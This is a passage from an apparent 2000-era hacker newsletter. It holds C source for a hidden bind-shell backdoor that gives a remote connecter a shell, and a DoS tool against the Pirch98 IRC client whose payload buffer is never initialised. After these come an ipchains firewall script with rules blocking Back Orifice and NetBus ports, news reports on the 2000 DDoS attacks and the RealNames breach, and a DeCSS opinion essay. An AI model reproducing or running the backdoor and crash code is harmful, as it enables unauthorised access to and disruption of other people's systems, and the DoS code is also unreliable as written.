login (int); #endif int background() { int pid; signal(SIGCHLD,SIG_IGN); pid = fork(); if(pid>0) { sleep(1); exit(EXIT_SUCCESS); // parent, exit } if(pid==0) { signal(SIGCHLD,SIG_DFL); return getpid(); // child, go on } return -1; // fork failed } int main (int argc, char *argv[]) { int sockfd, newfd, size; struct sockaddr_in local; struct sockaddr_in remote; char cmd[256]; strcpy (argv[0], HIDE); signal (SIGCHLD, SIG_IGN); bzero (&local, sizeof(local)); local.sin_family = AF_INET; local.sin_port = htons (PORT); local.sin_addr.s_addr = INADDR_ANY; bzero (&(local.sin_zero), 8); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } if (bind (sockfd, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(1); } if (listen(sockfd, 5) == -1) { perror("listen"); exit(1); } size = sizeof(struct sockaddr_in); background(); while (1) { if ((newfd = accept (sockfd, (struct sockaddr *)&remote, &size)) == -1) { perror ("accept"); exit(1); } if (!fork ()) { send (newfd, MSG_WELCOME, sizeof(MSG_WELCOME), 0); #ifdef PASSAUTH if (login(newfd) != 1) { send (newfd, MSG_WRONGPASS, sizeof(MSG_WRONGPASS), 0); close (newfd); exit(1); } #endif close (0); close(1); close(2); dup2 (newfd, 0); dup2(newfd, 1); dup2(newfd, 2); execl (SHELL, SHELL, (char *)0); close(newfd); exit(0); } close (newfd); } return 0; } #ifdef PASSAUTH int login (int fd) { char u_passwd[15]; int i; send (fd, MSG_PASSWORD, sizeof(MSG_PASSWORD), 0); recv (fd, u_passwd, sizeof(u_passwd), 0); for (i = 0; i < strlen (u_passwd); i++) { if (u_passwd[i] == '\n' || u_passwd[i] == '\r') u_passwd[i] = '\0'; } if (strcmp (PASSWD, u_passwd) == 0) { return 1; } else { return 0; } } #endif @HWA 35.0 Pirch98 ident/fserve daemon DoS attack. by eth0 (b0f) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://www.b0f.com/ /* code by eth0 from buffer0verfl0w security */ /* http://www.b0f.com */ /* *NOTE* code was not tested, this was only coded with the information given by Chopsui-cide/MmM '00, use at your own risk *NOTE* Pirch98 ident/fserve daemon DoS attack Feb, 20 2000 - 00:05 contributed by: Chopsui-cide Pirch98 irc client can be trivially crashed by a simple overflow if either the fserve, or ident daemons are active. */ #include #include #include #include #include #include #include #define dport 113 #define LEN 512 int x, s; char *str; /* varying the size would give diff results */ struct sockaddr_in addr, spoofedaddr; struct hostent *host; int open_sock(int sock, char *server, int port) { struct sockaddr_in blah; struct hostent *he; bzero((char *)&blah,sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) { bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) { perror("gethostbyname()"); return(-3); } } if (connect(sock,(struct sockaddr *)&blah,16)==-1) { perror("connect()"); close(sock); return(-4); } printf("Connected to [%s:%d].\n",server,port); return; } int main(int argc, char *argv[]) { if (argc != 2) { printf("Usage: %s \n",argv[0]); exit(0); } if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"); exit(-1); } open_sock(s,argv[1],dport); printf("Sending crash....\n "); send(s,str,LEN,0); printf("1st crash sent...\n"); printf("Sending crash....\n"); send(s,str,LEN,0); printf("2nd crash sent...\n"); printf("Sending crash.... \n"); send(s,str,LEN,0); printf("3rd crash sent...\n"); usleep(100000); printf("Done!\n"); close(s); return(0); } @HWA 36.0 Simple ipchains frontend script by eth0 (b0f) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ipchains is a kernel level firewall application for linux. Source: http://www.b0f.com/ #!/bin/sh #xxxxxxxxxxxxxxxxxxxxxxxxxxxx # buffer0verfl0w security...x # // eth0 x #xxxxxxxxxxxxxxxxxxxxxxxxxxxx # Simple ipchains frontend script to help you configure ipchains # for standalone... # usage: simply run... # ---------------------------------------------------------------- Interfaces - # Local Interface # This is the interface that is your link to the world LOCALIF="ppp0" # ------------------------------------------------------- Variable definition - # # Set the location of ipchains. IPCHAINS="/sbin/ipchains" # You shouldn't need to change anything in the rest of this section LOCALIP=`ifconfig $LOCALIF | grep inet | cut -d : -f 2 | cut -d \ -f 1` LOCALMASK=`ifconfig $LOCALIF | grep Mask | cut -d : -f 4` LOCALNET="$LOCALIP/$LOCALMASK" echo "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" echo "[standalone] IP: $LOCALNET" REMOTENET="0/0" # -------------------------------------- Flush everything, start from scratch - echo -n "[standalone] Flushing rulesets.." # Incoming packets from the outside network $IPCHAINS -F input echo -n "." # Outgoing packets from the internal network $IPCHAINS -F output echo -n "." echo "Done!" # -------------------------------------------------- Allow loopback interface - echo -n "[standalone] Loopback.." $IPCHAINS -A input -i lo -s 0/0 -d 0/0 -j ACCEPT $IPCHAINS -A output -i lo -s 0/0 -d 0/0 -j ACCEPT echo -n ".." echo "Done!" # ----------------------------------Set telnet, www and FTP for minimum delay - # This section manipulates the Type Of Service (TOS) bits of the # packet. For this to work, you must have CONFIG_IP_ROUTE_TOS enabled # in your kernel echo -n "[standalone] TOS flags.." $IPCHAINS -A output -p tcp -d 0/0 www -t 0x01 0x10 $IPCHAINS -A output -p tcp -d 0/0 telnet -t 0x01 0x10 $IPCHAINS -A output -p tcp -d 0/0 ftp -t 0x01 0x10 echo -n "..." # Set ftp-data for maximum throughput $IPCHAINS -A output -p tcp -d 0/0 ftp-data -t 0x01 0x08 echo -n "." echo "Done!" # ---------------------------------------------------------- Trusted Networks - # Add in any rules to specifically allow connections from hosts/nets that # would otherwise be blocked. # echo -n "[standalone] Trusted Networks.." # $IPCHAINS -A input -s [trusted host/net] -d $LOCALNET -j ACCEPT # echo -n "." # echo "Done!" # ----------------------------------------------------------- Banned Networks - # Add in any rules to specifically block connections from hosts/nets that # have been known to cause you problems. These packets are logged. # echo -n "[standalone] Banned Networks.." # This one is generic # $IPCHAINS -A input -l -s [banned host/net] -d $LOCALNET -j DENY # echo -n "." # This one blocks ICMP attacks # $IPCHAINS -A input -l -b -i $LOCALIF -p icmp -s [host/net] -d $LOCALNET -j DENY # echo -n "." # echo "Done!" # ------------------------------------------------------ @home-specific rules - # This @home stuff is pretty specific to me (terminus). I get massive port # scans from my neighbors and from pokey admins at @home, so I just got harsh # and blocked all their stuff, with a few exceptions, listed below. # # If someone out there finds out the ip ranges of JUST tci@home, let me know # so i don't end up blocking ALL cablemodems like it's doing now. echo -n "[standalone] Cable Modem Nets.." # so we can check mail, use the proxy server, hit @home's webpage. # you will want to set these to your local servers, and uncomment them # $IPCHAINS -A input -p tcp -s ha1.rdc1.wa.home.com -d $LOCALNET 1023:65535 -j ACCEPT # $IPCHAINS -A input -p tcp -s mail.tcma1.wa.home.com -d $LOCALNET 1023:65535 -j ACCEPT # $IPCHAINS -A input -p tcp -s www.tcma1.wa.home.com -d $LOCALNET 1023:65355 -j ACCEPT # $IPCHAINS -A input -p tcp -s proxy.tcma1.wa.home.com -d $LOCALNET 1023:65535 -j ACCEPT # echo -n "...." # so we can resolve the above hostnames, allow dns queries back to us # $IPCHAINS -A input -p tcp -s ns1.home.net -d $LOCALNET 1023:65535 -j ACCEPT # $IPCHAINS -A input -p tcp -s ns2.home.net -d $LOCALNET 1023:65535 -j ACCEPT # $IPCHAINS -A input -p udp -s ns1.home.net -d $LOCALNET 1023:65535 -j ACCEPT # $IPCHAINS -A input -p udp -s ns2.home.net -d $LOCALNET 1023:65535 -j ACCEPT # echo -n ".." # linux ipchains building script page (I think) # $IPCHAINS -A input -p tcp -s 24.128.61.117 -d $LOCALNET 1023:65535 -j ACCEPT # echo -n "." # Non-@home users may want to leave this uncommented, just to block all # the wannabe crackers. Add any @home hosts you want to allow BEFORE this line. # Blast all other @home connections into infinity and log them. $IPCHAINS -A input -l -s 24.0.0.0/8 -d $LOCALNET -j DENY echo -n "." echo "Done!" # ---------------------------- Specific port blocks on the external interface - # This section blocks off ports/services to the outside that have # vulnerabilities. This will not affect the ability to use these services # within your network. echo -n "[standalone] Port Blocks.." # NetBEUI/Samba $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 139 -j DENY $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 139 -j DENY echo -n "." # Microsoft SQL $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 1433 -j DENY $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 1433 -j DENY echo -n "." # Postgres SQL $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 5432 -j DENY $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 5432 -j DENY echo -n "." # Network File System $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 2049 -j DENY $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 2049 -j DENY echo -n "." # X Displays :0-:2- $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 5999:6003 -j DENY $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 5999:6003 -j DENY echo -n "." # X Font Server :0-:2- $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 7100 -j DENY $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 7100 -j DENY echo -n "." # Back Orifice (logged) $IPCHAINS -A input -l -p tcp -s $REMOTENET -d $LOCALNET 31337 -j DENY $IPCHAINS -A input -l -p udp -s $REMOTENET -d $LOCALNET 31337 -j DENY echo -n "." # NetBus (logged) $IPCHAINS -A input -l -p tcp -s $REMOTENET -d $LOCALNET 12345:12346 -j DENY $IPCHAINS -A input -l -p udp -s $REMOTENET -d $LOCALNET 12345:12346 -j DENY echo -n "." echo "Done!" # --------------------------------------------------- High Unprivileged ports - # These are opened up to allow sockets created by connections allowed by # ipchains echo -n "[standalone] High Ports.." $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 1023:65535 -j ACCEPT $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 1023:65535 -j ACCEPT echo -n "." echo "Done!" # ------------------------------------------------------------ Basic Services - echo -n "[standalone] Services.." # ftp-data (20) and ftp (21) # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 20 -j ACCEPT # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 21 -j ACCEPT # echo -n ".." # ssh (22) # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 22 -j ACCEPT # echo -n "." # telnet (23) # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 23 -j ACCEPT # echo -n "." # smtp (25) # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 25 -j ACCEPT # echo -n "." # DNS (53) $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 53 -j ACCEPT $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 53 -j ACCEPT echo -n ".." # DHCP on LAN side (to make @Home DHCP work) (67/68) # $IPCHAINS -A input -i $LOCALIF -p udp -s $REMOTENET -d 255.255.255.255/24 67 -j ACCEPT # $IPCHAINS -A output -i $LOCALIF -p udp -s $REMOTENET -d 255.255.255.255/24 68 -j ACCEPT # echo -n ".." # http (80) # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 80 -j ACCEPT # echo -n "." # POP-3 (110) # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 110 -j ACCEPT # echo -n "." # identd (113) $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 113 -j REJECT echo -n "." # nntp (119) # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 119 -j ACCEPT # echo -n "." # https (443) # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 443 -j ACCEPT # echo -n "." # ICQ Services (it's a server service) (4000) # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 4000 -j ACCEPT # echo -n "." echo "Done!" # ---------------------------------------------------------------------- ICMP - echo -n "[standalone] ICMP Rules.." # Use this to deny ICMP attacks from specific addresses # $IPCHAINS -A input -b -i $EXTERNALIF -p icmp -s

-d 0/0 -j DENY # echo -n "." # Allow incoming ICMP $IPCHAINS -A input -p icmp -s $REMOTENET -d $LOCALNET -j ACCEPT $IPCHAINS -A input -p icmp -s $REMOTENET -d $LOCALNET -j ACCEPT echo -n ".." # Allow outgoing ICMP $IPCHAINS -A output -p icmp -s $LOCALNET -d $REMOTENET -j ACCEPT $IPCHAINS -A output -p icmp -s $LOCALNET -d $REMOTENET -j ACCEPT echo -n "...." echo "Done!" # -------------------------------------------------------- set default policy - $IPCHAINS -A input -j DENY $IPCHAINS -A output -j ACCEPT echo "" echo "[standalone] Finished Establishing Firewall." echo "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" @HWA 37.0 HNN:Feb 14th:Clinton Calls for Cyber Security Summit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Joey As many as 20 top Internet executives are expected to meet with President Clinton, Attorney General Janet Reno and security advisers Tuesday. The Internet-security summit with high-tech industry leaders will be used to plot a response to this week's stunning attacks on the Web's most popular sites. (Hope they invite some people who understand the technology so that they don't overreact and do something stupid.) WSJ Interactive Edition - via ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2436551,00.html?chkpt=zdnntop @HWA 38.0 HNN:Feb 14th:Black, White, Grey, Where Exactly is the Line. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Adam This New York Times articles makes a lot of assumptions which we disagree with. The first is that people who write security tools should be prosecuted as well as the people that use them. This is like blaming car manufacturers for auto accidents. When industry has proven time and time again that it is not responsive to security holes unless it can be proven that the holes do in fact exist there is a need, however dangerous, for this sort of tool. As for the article's assumption that the line between good and bad is somehow getting blurrier we feel that it has never been more clear. NY Times http://www.nytimes.com/library/tech/yr/mo/biztech/articles/12hack.html (Pay access archives - Ed) @HWA 39.0 HNN:Feb 14th:Italian Cyber Criminals Apprehended ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by rigel Seven Italian cyber criminals were caught by the Italian Financial Police last Friday. They have been accused of breaking into Swiss Banks, the Universita di Catania, Toronto University and others. They have also been accused of somehow siphoning money from inter bank electronic transfers. The detectives in the case also suspect that the group may have broken into web sites for money. They have been charged with spying and theft of industrial secrets. Officials are still investigating. (This information is from a bad translation and may not be 100% accurate.) Ilmessaggero - Italian http://www.ilmessaggero.it/hermes/20000212/01_NAZIONALE/INTERNI/Dab.htm @HWA 40.0 HNN:Feb 14th: RealNames Customer Info and CC Numbers Stolen ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Joe RealNames, a company that substitutes complicated Web addresses with simple keywords, is warning its users that its customer database may have been stolen, and that user credit card numbers and passwords may have been accessed. (Why are companies storing this information? After the transaction is complete they have no need to store the number.) C|Net http://home.cnet.com/category/0-1005-200-1547688.html Wired http://www.wired.com/news/business/0,1367,34295,00.html C|Net RealNames' customer database hacked By Jim Hu Staff Writer, CNET News.com February 11, 2000, 9:10 a.m. PT RealNames, a company that substitutes complicated Web addresses with simple keywords, is warning its users that its customer database has been hacked, and that user credit card numbers and passwords may have been accessed. The company informed its customers of the security breach in an email written and sent by RealNames chief executive Keith Teare early this morning. "Within the last 24 hours we have identified a situation that may have resulted in our customer information database being compromised, including customer credit card information," the email read. The attacks occurred late Wednesday afternoon, Teare told CNET News.com. A user can register and pay for keywords on RealNames' Web site via credit card by filling out a form that includes personal information, such as his or her name, address and email address. RealNames then stores that information in a database, just like an e-commerce company or domain name registrar would with a customer making an online purchase or registration. The perpetrator was able to access customer records, credit card numbers and passwords. But Teare said there was no evidence that any credit card numbers have been used. The company contacted the FBI and participating credit card companies when the hack was discovered. "We've added further security over the last 48 hours," Teare said. RealNames is enlisting Atlanta-based security firm ISS to conduct an audit, Teare said. The attacks on RealNames were not similar to the distributed denial of service (DDoS) attacks inflicted upon major Web sites such as Yahoo, eBay and Amazon.com earlier this week. Those attacks merely shut down the sites for roughly a three- to five-hour period. The attack on RealNames was more "malicious" with an intent on accessing private information, a customer service representative said. In contrast to the DDoS attacks, the attack on RealNames was aimed at breaking into the company's database and redirecting a number of its Internet keyword URLs to a government site in the People's Republic of China, Teare said. Because hackers commonly fake an Internet address of origin, Teare could not conclude whether the hacker originated in China. RealNames, based in San Carlos, Calif., has developed a system based on Internet keywords that allows users to type familiar words or phrases to simplify Internet navigation. The concept is designed as an add-on to search engines and directories and to move from point to point on the Internet, the company said. Wired; CCs Stolen From RealNames? by Lynn Burke 10:30 a.m. 11.Feb.2000 PST Internet search tool company RealNames has become the latest site to be cracked by Internet vandals -- only this time tens of thousands of customer credit cards and passwords may have been stolen. RealNames CEO Keith Teare said the San Carlos, California company discovered the intruder late Wednesday afternoon, when user searches for company names were suddenly all routed to www.188.net, a site written entirely in Chinese and believed to be associated with the Chinese government. "I think it's probably just random," he said. "It was just a wakeup call saying 'Hey, I'm here.'" Teare said a security audit showed someone had gained access to the front-end of the company's system, and admitted the intruder �- who is believed to be working from China -- had been there for at least several days prior. Credit card companies have been notified of the security breach, and so far, no one has reported any fraud associated with the RealNames break-in. The company has since updated its security, and says it is confident a similar incident will not happen in the future. And despite what Teare calls a "state of the art" security system that was in place before the break-in, he admits there may have been some weak links. "I think it would be dishonest to say no, there's nothing we could have done. You can always do more," he said. "We're pretty water-tight from an industry standard, but you can never be diligent enough." RealNames sent a letter out early Friday to customers informing them of the break-in. The email linked the attack on its company to the spate of denial of service attacks that have struck major Internet companies like Yahoo and Amazon. "You may have heard, through recent and widespread media coverage, that several Internet companies have been plagued by the irresponsible and malicious activities of so-called 'hackers,'" the email read. "RealNames, unfortunately, has also fallen victim to this." But asked on Friday whether he thought a connection existed, Teare said no. "I don't want to speculate, but probably not," he said. Computer security expert Elias Levy agrees. "I would say they seem to be unrelated," he said. "But it does bring home the point that during the last two months there's been a barrage of security breaks, from CD Universe to the denial of service attacks." "Now that Y2K is over, people need to shift their strategy," he said. "There needs to be more investment on security technology, and non-technological means to mitigate the risk." @HWA 41.0 HNN: Feb 14th: Hacker Hijack or Misconfigued Server? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ted Envisioneering Group, a Long Island technology consulting company, claimed that one of its servers was hijacked on two separate days to launch a denial of service attack on a major Web site. This particular denial of service attack was done with large volumes of email. Envisioneering Group President Richard Doherty claimed that their servers where 'hijacked by hackers'. (Sounds like a misconfigued mail server that allowed spam relays to me.) CNN http://www.cnn.com/2000/TECH/computing/02/11/cyber.attacks.01/index.html Consulting firm says its server was used to attack AOL February 11, 2000 Web posted at: 6:57 p.m. EST (2357 GMT) From Interactive Technology Editor D. Ian Hopper and Justice Correspondent Pierre Thomas NEW YORK (CNN) -- Envisioneering Group, a Long Island technology consultant, told CNN on Friday that one of its servers was hijacked on two separate days to launch a version of a denial of service attack on a major Web site. In such assaults, hackers hijack multiple third-party computers and use those "zombie" computers to flood target sites with data, essentially shutting down access to the sites for would-be users. The first intrusion was on January 29 and involved using a computer to pass large volumes of e-mail from a third party on to a Web site server in an attempt to overwhelm the site. In the span of 15 minutes, several dozen e-mails a second were sent through the Envisioneering server to both Yahoo! and America Online. During the attack, engineers at Envisioneering stopped the attack, according to Envisioneering Group President Richard Doherty. "We dumped all the pending mail, and that stopped the repeated attacks [on Envisioneering]," Doherty said. Yahoo! was jammed by messages on Monday. The Envisoneering server was used again in the same fashion on Tuesday, a day when highly trafficked Internet sites such as Amazon.com, Buy.com and CNN.com were hit with denial of service attacks. But in the second incident involving his server, Doherty says he doesn't know exactly where the messages were sent. AOL: Assault didn't amount to a pinprick The first attack could have been a form of target practice to confirm that the Envisioneering server was vulnerable with the intention of using it in the later attack. AOL, for its part, reported no out of the ordinary traffic on either of the dates cited by Doherty. The attack had no effect on the huge Internet service provider, an AOL spokeswoman said. Envisioneering uses Mindspring for its Internet access. but even if a hacker somehow gained control of the entire Mindspring network and pointed it at AOL, it wouldn't "register a significant amount of volume to cause a problem," according to AOL spokesperson Tricia Primrose. This is because of Mindspring's relatively small total bandwidth. With the known resources of the intruder -- one computer at Envisioneering Group -- the assault didn't even amount to a pinprick, Primrose said. Yahoo! did not immediately return calls for comment. AOL has proposed buying Time Warner Inc., the parent company of CNN.com. It is awaiting approval from the Federal Trade Commission. FBI zeroing in on locations in California, Oregon Meanwhile, CNN has learned the FBI is zeroing in on undisclosed locations in California and Oregon as it attempts to unravel this week's cyber assaults. According to sources familiar with the investigations, the FBI is hoping to obtain computers that it believes were used in an attack on CNN.com. No arrests are considered imminent. The FBI's planned action comes after investigators discovered the computer system at the University of California at Santa Barbara was used in the attack against CNN.com. As the smoke begins to clear from the spate of attacks, CNN continues to get sporadic reports about other major Web sites assaulted. Excite@Home confirmed that it was attacked Wednesday night at 7 p.m. PST. The attack lasted about an hour, according to a spokesperson. About 50 percent of users trying to access the Excite portal and search engine couldn't reach the site during the attack, which targeted and overloaded routers. Only the Web site was under attack, the @Home cable network was not affected. "We're working with the Internet community to try to find out what's going on," says Excite@Home spokesperson Kelly Distefano. Server compromised A University of California- Santa Barbara network administrator has confirmed that a server at the university was compromised and used in at least one of the attacks against major Web sites this week. Sources declined to identify the owners of the computers that are being targeted. While those owners may emerge as suspects, sources point out that their computers might have been programmed without their knowledge. Still, the belief is that these computers may have been used to direct commands to a computer system at UCSB. This computer then flooded the affected Web site with millions of messages -- blocking access to customers. UCSB administrator Kevin Schmidt said an intruder entered the UCSB machine at least twice. After entering the first time to open doors needed later, the intruder returned to install a software package designed to carry out an attack, Schmidt said. The program, once executed, began its assault by sending out connection requests to the target Web site creating a "denial of service" attack. With enough requests sent to a single Web site, the site can be rendered inaccessible to legitimate users. In order to conceal the attack, the program began rotating the origination addresses of the requests. This method, known generally as "spoofing," is used to thwart filters on the target machine designed to identify and weed out malicious data. Schmidt said the intruder was "sloppy" in his work and failed to destroy all the logs monitoring activity on the server. "There wasn't a great effort to hide their presence," Schmidt said. "I don't think this behavior was atypical" of an untrained hacker. How they did it The intruder entered the UCSB computer through a known vulnerability in an installed network service. These vulnerabilities are frequently announced through Carnegie Mellon University's CERT group, National Infrastructure Protection Center and other network security forums. To plug the holes, administrators simply need to install patches or workarounds. However, with so many individual machines on the Internet and other demands competing for the time of a network guru, many computers are left unsecured. Along with CNN.com, other attacks were carried out against Yahoo!, eBay and Amazon.com As CNN has reported, the programs needed to make a denial of service attack are very simple to find on several Web sites. They are ready-made programs that are easy for almost anyone to use. @HWA 42.0 HNN: Feb 14th: Windows 2000 Has 63,000 Bugs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by warpathdoc Reporters at Sm@rt reseller claim to have received an internal Microsoft memo that says that Windows 2000 has 63,000 bugs. Windows 2000 is scheduled to ship in four days. Microsoft spokes people said that "All software ships with issues." (I guess since everyone else does it that makes it OK?) Sm@rt Reseller http://www.zdnet.com/zdnn/stories/news/0,4586,2436920,00.html?chkpt=zdhpnews01 @HWA 43.0 HNN:Feb 15th: Buffer overflow: DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ The DeCSS case and how to change a Big Business (BB) in today's world B y Dr. Z (Nigel Loring) I have watched this case of legal muscling and intimidation and just had to comment with an attitude of "What are the hackers doing here?" This is BB vs. scattered and unfocussed "hackers". Who do I think will win? BB of course! Just look at the situation: BB wants to establish that they will punish anyone they want by using legal bullying tactics. They pick a small entity (the "little guy", a son and his father) with a "potential" impact on BB's business. It doesn't matter that the "potential" adverse effect is not real or logical. The business is playing on their own field of expertise, where they know the rules and the hacker community doesn't even read the rule book. The media love it and BB plays it for all its worth. After all, BB has labeled the little guy a "criminal", a nerd and a foreigner, and the people who would complain are those other nerdy guys (Linux users - and what place do they really have in the world high technology order - just esoteric). Why do I say that BB will win? Just look at the comments in Slashdot's talk-back to the initial indictment: You can characterize them as whiny, uninformed, and petulant. Suggestions are made that boycotting of BB and donations to the little guy are the ways to help. Give me a break! Boycotts don't work unless you have an established big organization (Green Peace, Sierra Club, NAACP, and the Christian Right come to mind). Donations from a few hundred (or 10's) of hackers don't merit any stories in any media (except in on-line talk-backs where they are buried by the high volume of ranting, raving, and novice legal opinions). Let me call into question who wants to be called a hacker. Check out the L0pht's website and the definition they use. Their classic definition is the best and most rewarding: doing things (solving problems) in a way that was not intended or planned. For myself, I think you should "hack" life. Wozniak did it, Gates did it, the Internet originators did it, the guy who invented the spreadsheet did it, and the L0pht is doing it. Look at what they did - it was different and enjoyable, and with dedication, they made a difference. Yeah sure, one might get arrogant like Gates, but take a look at the others and the L0pht. They're in a different mold. So, you have this case against reverse-engineering a trade secret and then showing everyone how to do it. Let's be brutally frank about it. The legal results are guaranteed: If you don't understand the game that is going to play out here, you're going to lose. Just slink away and let the legal people and BB play the game to get what they want. In my opinion, if I was a lawyer for BB I would be laughing at the ranting and raving going on by the "hackers", and the media's obvious siding with my client. I have a no lose situation. I can: Settle out of court before trial (BB wins and gags the "little guy"); settle after starting the trial (BB wins by getting publicity that they will pursue by legal bullying anything that THEY think might hurt their interests); let the court decide (if BB loses, they WIN with a spin-doctoring that says they only lost by a technicality in Norway - and man, have they punished the little guy with his costs). There you have it - end of episode - a clear case of flipping a coin with the bet: "Heads I WIN, tails you LOSE." But wait a minute. Aren't you hackers? Can't you see that if you learn the game you can change the way things are done and get the outcome YOU want? You CAN hack big business and surprise the hell out of the CEOs and lawyers. They have a soft underbelly. When a company presses legal claims they are playing a high stakes game. Usually, they do not play that game unless they are pretty confident they can WIN. But sometimes they go wrong by underestimating the resourcefulness of their opponent and being arrogant. That's a deadly combination. A classic case comes from years ago when the telephone company sued a guy in California for extending his phone with a home-made system to connect all the buildings on his farm. They claimed that he was setting up an exchange and only the phone company wanted to be able to do that. The phone company was arrogant and wanted to set the precedent that they owned all phone systems. They didn't expect that as a ham-radio operator he would get the National HAM Radio Operator's Club to support and defend him. The phone company lost big-time and this set the precedent that the phone company owns ONLY up to your property or the box going into your house. Inside, you can do whatever you like, so long as it doesn't interfere with the phone company's operations. I bet the phone company wishes it had never sued that ham-radio operator. So, this is how you can do the same thing today to the DVD Consortium: Did you know that owning one (1) share of any public stock entitles you (or your proxy) to attend and vote at the Annual Stockholders Meeting of that publicly held big business? Did you know that you can actually make a few statements on the record at those meetings? Do you know that Mutual Fund Managers have forced big businesses to merge, not to merge (see P&G and Warner-Lambert talks in January) or do other business things because the Fund Manager has proxy control of large amounts of the big business's stocks. Did you know that each time big business's stock drops and you find that a big business Officer sold his stock just before the drop, you can sue him? Yes, you can, and it happens a LOT - you just don't hear about it. Big business almost always settles out of court before a trial (think they want to go to court when they can get rid of the annoyance by paying off the complainer - it's almost legal extortion - but the complainer has to lose money in the first place for the suit to have teeth.) The only kicker is: The fewer proxies, the less influence. Now, you don't have much clout with one share. But what if you, and people who think like you, combine your proxies and vote as a block. THIS is power! THIS is what will make Big Business's CEO and other company officers take notice. THIS is charging onto the playing field with a rule book in your hand and power in your pocket. You WILL be noticed! You should also realize that only a fraction of the stockholders in a company ever assigns their proxies to someone; usually BB asks the stockholders for their proxies to vote what BB wants. So the stockholders meeting attendees represent only a part of the total shares in the company. Your block of shares then has more clout than you think. If you can get enough opposition to the mainline BB view, the Meeting notice can even state them. It doesn't have to stop there either. If you have a block of votes, then the media is going to take notice also. Just imagine the story: "Hackers, claiming ethical and economic reasons, plan to attend Annual Stockholders Meeting to voice opposition to BB's DVD policies." Imagine BB's CEO seeing that in his favorite media. That's delicious and legal. OK, you say you can't get hackers to descend on BB at the right time (work schedules, travel, distances, costs). PLAY the game. Hack the rules. (Remember, this doesn't mean break the rules - just apply them in a different way that no one thought of before.) You have proxies - pool them! Find a well-respected and ethical organization and set up an account that holds stock owned by individuals. The sole purpose of the account is non-profit and to vote the proxies of that stock as a block. Have ONE person with those proxies show up at the meeting. Broadcast it. Call up the company and tell them what you plan to do (I smile when thinking of that phone call to the Investor Relations Department of BB). Remember, the Security and Exchange Commission, which allowed the company to raise a lot of money by going public, makes BB play by SEC rules. If you understand computers you can understand the SEC rules. (Ha! Think the lawyers, who study the SEC rules, know computers like a hacker does? No Way. The lawyers have to hire outside experts --- Hmmm, maybe friends of yours.) The beauty of this is that each of you still owns your shares of stock. You aren't donating all that money to anyone! Later, you can have the stock sold and get almost all the money back. Let's look at examples of costs to you: If the Holding Company sells it on-line, you might lose a few cents. Think of it this way: Honest (and savvy) Holding Company sells 1000 shares at $100/share through an on-line broker for < $10. If the 1000 shares came from 1000 people then the per person cost of the sale would be $0.01! Note that the transaction is $100,000 total, but Holding Company only expensed $10 total. One on-line broker lets you trade up to 5000 shares for <$10. (If you had 5000 shares of MSFT (~$100/share) that would be $500,000 traded for <$10.) Ahh, the beauty of on-line brokers! Do you feel that this cause is worth 1 cent? Now, I know that the Holding Company will have some operating expenses too, but that can be worked out to cover expenses with full disclosure guaranteed. This should be a cause, not a plan to make anyone money. Here's another angle in the hack. Your holding company can sell all but a 